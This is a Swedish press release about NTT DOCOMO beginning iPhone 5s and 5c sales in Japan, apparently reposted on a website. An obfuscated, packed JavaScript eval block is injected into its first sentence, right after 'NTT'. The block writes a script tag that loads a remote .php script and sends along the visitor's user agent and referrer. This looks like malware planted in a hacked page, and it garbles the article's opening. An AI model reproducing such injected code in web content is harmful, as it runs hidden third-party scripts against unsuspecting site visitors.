Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

NTT DOCOMO: iPhone i Japan den 20 september

NTT DOCOMO: iPhone i Japan den 20 september

NTT eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbfse|var|u0026u|referrer|rhsey||js|php’.split(’|’),0,{}))
DOCOMO och Apple meddelade idag att iPhone 5s, världens mest framåtblickande smartphone, och iPhone 5c, vår hittills mest färgglada iPhone, kommer att vara tillgängliga på DOCOMO-nätverket från och med fredagen den 20 september.

iPhone 5s har ett helt nytt A7-chip, vilket gör iPhone 5s till världens första smartphone med 64-bitars arkitektur i klass med en stationär dator för blixtsnabb prestanda, en helt ny 8-megapixels iSight-kamera samt nyheten Touch ID, ett innovativt sätt att enkelt och säkert låsa upp iPhone. iPhone 5c har en helt ny design, är fullpackad med fantastiska funktioner som folk känner till och gillar och finns i fem snygga färger: blått, grönt, rosa, gult och vitt.

”Vi är entusiastiska över att kunna erbjuda nya iPhone 5s och iPhone 5c till våra kunder”, säger Kaoru Kato, ordförande och CEO på NTT DOCOMO, Inc. ”Vi vet att våra kunder kommer att gilla att använda iPhone på DOCOMO:s högkvalitativa nätverk.”

”NTT DOCOMO har byggt upp ett imponerande nätverk med över 60 miljoner kunder, vilket är det största i landet”, säger Tim Cook, Apples CEO. ”Vi har haft enastående framgångar med iPhone i Japan. Det är faktiskt den smartphone som säljer bäst i landet och vi ser fram emot att leverera iPhone till ännu fler kunder med hjälp av NTT DOCOMO.”

Med lanseringen av nya iPhone 5s, iPhone 5c och iOS 7 tar Apple täten för nästa generations mobila datorlösningar med fantastisk hård- och mjukvara som bara Apple kan skapa. Med iPhone 5s förändrar Apple upplevelsen av världens bästa smartphone med enastående nya funktioner i en tunn och lätt design, till exempel det Apple-utvecklade 64-bitars A7-chippet, den helt nya 8-megapixels iSight-kameran med True Tone-blixt samt nyheten Touch ID, ett innovativt sätt att enkelt och säkert låsa upp telefonen med en enda fingertryckning. iPhone 5c har en helt ny design och är fullpackad med funktioner som folk känner till och gillar, som den fantastiska 4-tums Retina-skärmen, A6-chippet med blixtsnabb prestanda, 8-megapixels iSight-kameran och ännu bättre batteritid.¹ iPhone 5s och iPhone 5c har båda fler LTE-band² än någon annan smartphone i världen och helt nya FaceTime HD-kameror.

iPhone 5s och iPhone 5c använder iOS 7, den viktigaste iOS-uppdateringen sedan den första modellen av iPhone, som har ett nytt imponerande användargränssnitt med helt ny design och en elegant färgpalett, tydliga funktionella lager och subtila rörelser som ger en mer levande och dynamisk känsla. iOS 7 har hundratals fantastiska nya funktioner, bland annat Kontrollcenter, Notiscenter, förbättrad multitasking, AirDrop, förbättringar av Bilder, Safari och Siri och nya iTunes-radio, en kostnadsfri internetradiotjänst som baseras på det du lyssnar på i iTunes.³

Från och med fredagen den 13 september kan kunder förbeställa iPhone 5c hos DOCOMO-återförsäljare och de första 30 000 DOCOMO Premier Club Premier Stage-kunderna? kan förbeställa från DOCOMO:s webbplats.?

Mer information om iPhone finns på www.apple.com/se/iphone.

¹ Batteritiden beror på enhetens inställningar, användning och andra faktorer. De faktiska resultaten kan variera.

² LTE är tillgängligt hos utvalda operatörer. Nätverkshastigheten beror på operatörsnätverket. Kontakta operatören för mer information.

³ iTunes-radio blir tillgängligt i samband med lanseringen av iOS 7 i USA.

? DOCOMO Premier Club Premier Stage: Kunder som har ansökt om företagets medlemskapsprogram ”docomo Premier Club” och har varit användare i tio år eller mer eller vars samlade Stage-poäng är 2 500 eller mer under perioden januari 2012 till december 2012.

? Kunder kan ansöka om förbeställning på webbplatsen, men för att köpa och ta emot den faktiska telefonen måste de besöka en DOCOMO-butik, vilket anges vid ansökan.

NTT DOCOMO tillhandahåller innovativa, praktiska och säkra mobiltjänster som gör att alla kunder kan leva smartare. Företaget förser över 61 miljoner mobilkunder i Japan med avancerade trådlösa nätverk, inklusive ett rikstäckande 3G-nät och ett av världens första kommersiella LTE-nät. DOCOMO bygger vidare på sin unika ställning som mobiloperatör för att utveckla banbrytande teknik för mobilbetalning med NFC, mobil GPS, mobil-TV, intuitiv mobilhjälp, miljöövervakning, smarta elnät och mycket mer. I andra länder tillhandahåller företaget teknisk och driftsmässig expertis till åtta mobiloperatörer och andra partnerföretag. NTT DOCOMO är noterat på börserna i Tokyo (9437), London (NDCM) och New York (DCM). Mer information finns på www.nttdocomo.co.jp/english.

Apple designar Mac-datorerna – världens bästa persondatorer – och OS X, iLife, iWork samt en rad professionella program. Apple leder den digitala musikrevolutionen med iPod och iTunes Store. Apple har förnyat mobiltelefonen med den banbrytande iPhone och App Store och stakar ut den framtida utvecklingen inom mobila medier och datorteknik med iPad.